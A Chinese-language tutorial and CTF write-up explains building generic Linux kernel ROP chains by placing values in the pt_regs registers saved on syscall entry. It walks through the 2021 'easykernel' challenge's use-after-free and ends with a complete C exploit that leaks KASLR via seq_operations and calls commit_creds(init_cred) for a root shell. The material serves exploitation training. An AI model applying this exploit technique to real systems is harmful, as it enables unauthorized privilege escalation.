利用 pt_regs 构造通用内核 ROP¶
系统调用 与 pt_regs 结构体¶
系统调用的本质是什么?或许不少人都能够答得上来是由我们在用户态布置好相应的参数后执行 syscall
这一汇编指令,通过门结构进入到内核中的 entry_SYSCALL_64
这一函数,随后通过系统调用表跳转到对应的函数。
现在让我们将目光放到 entry_SYSCALL_64
这一用汇编写的函数内部,注意到当程序进入到内核太时,该函数会将所有的寄存器压入内核栈上,形成一个 pt_regs 结构体,该结构体实质上位于内核栈底,定义如下:
struct pt_regs {
/*
* C ABI says these regs are callee-preserved. They aren't saved on kernel entry
* unless syscall needs a complete, fully filled "struct pt_regs".
*/
unsigned long r15;
unsigned long r14;
unsigned long r13;
unsigned long r12;
unsigned long rbp;
unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
unsigned long r11;
unsigned long r10;
unsigned long r9;
unsigned long r8;
unsigned long rax;
unsigned long rcx;
unsigned long rdx;
unsigned long rsi;
unsigned long rdi;
/*
* On syscall entry, this is syscall#. On CPU exception, this is error code.
* On hw interrupt, it's IRQ number:
*/
unsigned long orig_rax;
/* Return frame for iretq */
unsigned long rip;
unsigned long cs;
unsigned long eflags;
unsigned long rsp;
unsigned long ss;
/* top of stack page */
};
内核栈 与通用 ROP¶
我们都知道,内核栈只有一个页面的大小,而 pt_regs 结构体则固定位于内核栈栈底,当我们劫持内核结构体中的某个函数指针时(例如 seq_operations->start),在我们通过该函数指针劫持内核执行流时 rsp 与 栈底的相对偏移通常是不变的。
而在系统调用当中过程有很多的寄存器其实是不一定能用上的,比如 r8 ~ r15,这些寄存器为我们布置 ROP 链提供了可能,我们不难想到:
- 只需要寻找到一条形如 "add rsp, val ; ret" 的 gadget 便能够完成 ROP
这里笔者给出一个通用的 ROP 板子,方便调试时观察:
__asm__(
"mov r15, 0xbeefdead;"
"mov r14, 0x11111111;"
"mov r13, 0x22222222;"
"mov r12, 0x33333333;"
"mov rbp, 0x44444444;"
"mov rbx, 0x55555555;"
"mov r11, 0x66666666;"
"mov r10, 0x77777777;"
"mov r9, 0x88888888;"
"mov r8, 0x99999999;"
"xor rax, rax;"
"mov rcx, 0xaaaaaaaa;"
"mov rdx, 8;"
"mov rsi, rsp;"
"mov rdi, seq_fd;" // 这里假定通过 seq_operations->stat 来触发
"syscall"
);
新版本内核对抗利用 pt_regs 进行攻击的办法¶
正所谓魔高一尺道高一丈,内核主线在 这个 commit 中为系统调用栈添加了一个偏移值,这意味着 pt_regs 与我们触发劫持内核执行流时的栈间偏移值不再是固定值:
diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
index 4efd39aacb9f2..7b2542b13ebd9 100644
--- a/arch/x86/entry/common.c
+++ b/arch/x86/entry/common.c
@@ -38,6 +38,7 @@
#ifdef CONFIG_X86_64
__visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs)
{
+ add_random_kstack_offset();
nr = syscall_enter_from_user_mode(regs, nr);
instrumentation_begin();
当然,若是在这个随机偏移值较小且我们仍有足够多的寄存器可用的情况下,仍然可以通过布置一些 slide gadget 来继续完成利用,不过稳定性也大幅下降了。
例题:西湖论剑2021线上初赛 - easykernel¶
分析¶
首先查看启动脚本,可以发现开启了 SMEP 和 KASLR:
#!/bin/sh
qemu-system-x86_64 \
-m 64M \
-cpu kvm64,+smep \
-kernel ./bzImage \
-initrd rootfs.img \
-nographic \
-s \
-append "console=ttyS0 kaslr quiet noapic"
进入题目环境,查看 /sys/devices/system/cpu/vulnerabilities/*
,可以发现开启了 PTI (页表隔离):
/ $ cat /sys/devices/system/cpu/vulnerabilities/*
KVM: Mitigation: VMX unsupported
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected
Not affected
题目给了个 test.ko,拖入 IDA 进行分析,发现只定义了 ioctl,可以看出是常见的“菜单堆”题目,给出了分配、释放、读、写 object 的功能。对于分配 object,我们需要传入如下形式结构体:
struct
{
size_t size;
void *buf;
}
对于释放、读、写 object,则需要传入如下形式结构体:
struct
{
size_t idx;
size_t size;
void *buf;
};
分配:0x20¶
比较常规的 kmalloc,没有限制size,最多可以分配 0x20 个 chunk:
v7 = _kmalloc(v12, 3264LL);
v8 = v7;
if ( !v7 )
return 0LL;
v9 = v12;
v10 = v13;
if ( v12 > 0x7FFFFFFF )
goto LABEL_29;
_check_object_size(v7, v12, 0LL);
v11 = copy_from_user(v8, v10, v9);
if ( v11 )
return 0LL;
while ( addrList[v11] )
{
if ( ++v11 == 32 )
return 0LL;
}
addrList[(int)v11] = v8;
return 0LL;
}
释放:0x30¶
kfree 以后没有清空指针,直接就有一个裸的 UAF 糊脸:
if ( a2 != 32 )
{
if ( a2 != 48 )
return result;
if ( !copy_from_user(&v12, v2, 8LL) )
{
if ( (unsigned int)v12 <= 0x20 )
{
if ( addrList[(unsigned int)v12] )
kfree();
}
return 0LL;
}
return -22LL;
}
读:0x40¶
会调用 show 函数:
if ( a2 == 64 )
{
if ( !copy_from_user(&v12, v2, 24LL) )
{
show(&v12);
return 0LL;
}
return -22LL;
}
其实就是套了一层皮的读 object 内容,加了 hardened usercopy 检查:
__int64 __fastcall show(_QWORD *a1)
{
const void *v1; // rsi
unsigned __int64 v2; // r13
__int64 v3; // r14
_QWORD v5[37]; // [rsp-128h] [rbp-128h] BYREF
_fentry__();
v5[32] = __readgsqword(0x28u);
v5[0] = 0LL;
memset(&v5[1], 0, 0xF8uLL);
if ( (unsigned int)*a1 > 0x20 )
return 0xFFFFFFFFLL;
v1 = (const void *)addrList[(unsigned int)*a1];
if ( !v1 )
return 0xFFFFFFFFLL;
v2 = a1[1];
v3 = a1[2];
qmemcpy(v5, v1, 0x100uLL);
if ( v2 > 0x100 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 256LL, v2);
BUG();
}
_check_object_size(v5, v2, 1LL);
return copy_to_user(v3, v5, v2) != 0 ? 0xFFFFFFEA : 0;
}
写:0x50¶
常规的写入 object:
if ( a2 > 0x40 )
{
if ( a2 == 80 )
{
if ( copy_from_user(&v12, v2, 24LL) )
return -22LL;
if ( (unsigned int)v12 <= 0x20 )
{
v4 = addrList[(unsigned int)v12];
if ( v4 )
{
v5 = v13;
v6 = v14;
if ( v13 <= 0x7FFFFFFF )
{
_check_object_size(addrList[(unsigned int)v12], v13, 0LL);
copy_from_user(v4, v6, v5);
return 0LL;
}
LABEL_29:
BUG();
}
}
}
return 0LL;
}
解法:UAF + seq_operations + pt_regs + ROP¶
题目没有说明,那笔者默认应该是没开 Hardened Freelist,现在又有 UAF,那么解法就是多种多样的了,笔者这里选择用 seq_operations
+ pt_regs
构造 ROP 进行提权:
exp 如下:
#include <fcntl.h>
#include <stddef.h>
#define COMMIT_CREDS 0xffffffff810c8d40
#define SEQ_OPS_0 0xffffffff81319d30
#define INIT_CRED 0xffffffff82663300
#define POP_RDI_RET 0xffffffff81089250
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00f30
long dev_fd;
struct op_chunk
{
size_t idx;
size_t size;
void *buf;
};
struct alloc_chunk
{
size_t size;
void *buf;
};
void readChunk(size_t idx, size_t size, void *buf)
{
struct op_chunk op =
{
.idx = idx,
.size = size,
.buf = buf,
};
ioctl(dev_fd, 0x40, &op);
}
void writeChunk(size_t idx, size_t size, void *buf)
{
struct op_chunk op =
{
.idx = idx,
.size = size,
.buf = buf,
};
ioctl(dev_fd, 0x50, &op);
}
void deleteChunk(size_t idx)
{
struct op_chunk op =
{
.idx = idx,
};
ioctl(dev_fd, 0x30, &op);
}
void allocChunk(size_t size, void *buf)
{
struct alloc_chunk alloc =
{
.size = size,
.buf = buf,
};
ioctl(dev_fd, 0x20, &alloc);
}
size_t buf[0x100];
size_t swapgs_restore_regs_and_return_to_usermode;
size_t init_cred;
size_t pop_rdi_ret;
long seq_fd;
void * kernel_base = 0xffffffff81000000;
size_t kernel_offset = 0;
size_t commit_creds;
size_t gadget;
int main(int argc, char ** argv, char ** envp)
{
dev_fd = open("/dev/kerpwn", O_RDWR);
allocChunk(0x20, buf);
deleteChunk(0);
seq_fd = open("/proc/self/stat", O_RDONLY);
readChunk(0, 0x20, buf);
kernel_offset = buf[0] - SEQ_OPS_0;
kernel_base += kernel_offset;
swapgs_restore_regs_and_return_to_usermode = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + kernel_offset;
init_cred = INIT_CRED + kernel_offset;
pop_rdi_ret = POP_RDI_RET + kernel_offset;
commit_creds = COMMIT_CREDS + kernel_offset;
gadget = 0xffffffff8135b0f6 + kernel_offset; // add rsp 一个数然后 pop 一堆寄存器最后ret,具体的不记得了,懒得再回去翻了
buf[0] = gadget;
swapgs_restore_regs_and_return_to_usermode += 9;
writeChunk(0, 0x20, buf);
__asm__(
"mov r15, 0xbeefdead;"
"mov r14, pop_rdi_ret;"
"mov r13, init_cred;" // add rsp, 0x40 ; ret
"mov r12, commit_creds;"
"mov rbp, swapgs_restore_regs_and_return_to_usermode;"
"mov rbx, 0x999999999;"
"mov r11, 0x114514;"
"mov r10, 0x666666666;"
"mov r9, 0x1919114514;"
"mov r8, 0xabcd1919810;"
"xor rax, rax;"
"mov rcx, 0x666666;"
"mov rdx, 8;"
"mov rsi, rsp;"
"mov rdi, seq_fd;"
"syscall"
);
system("/bin/sh");
return 0;
}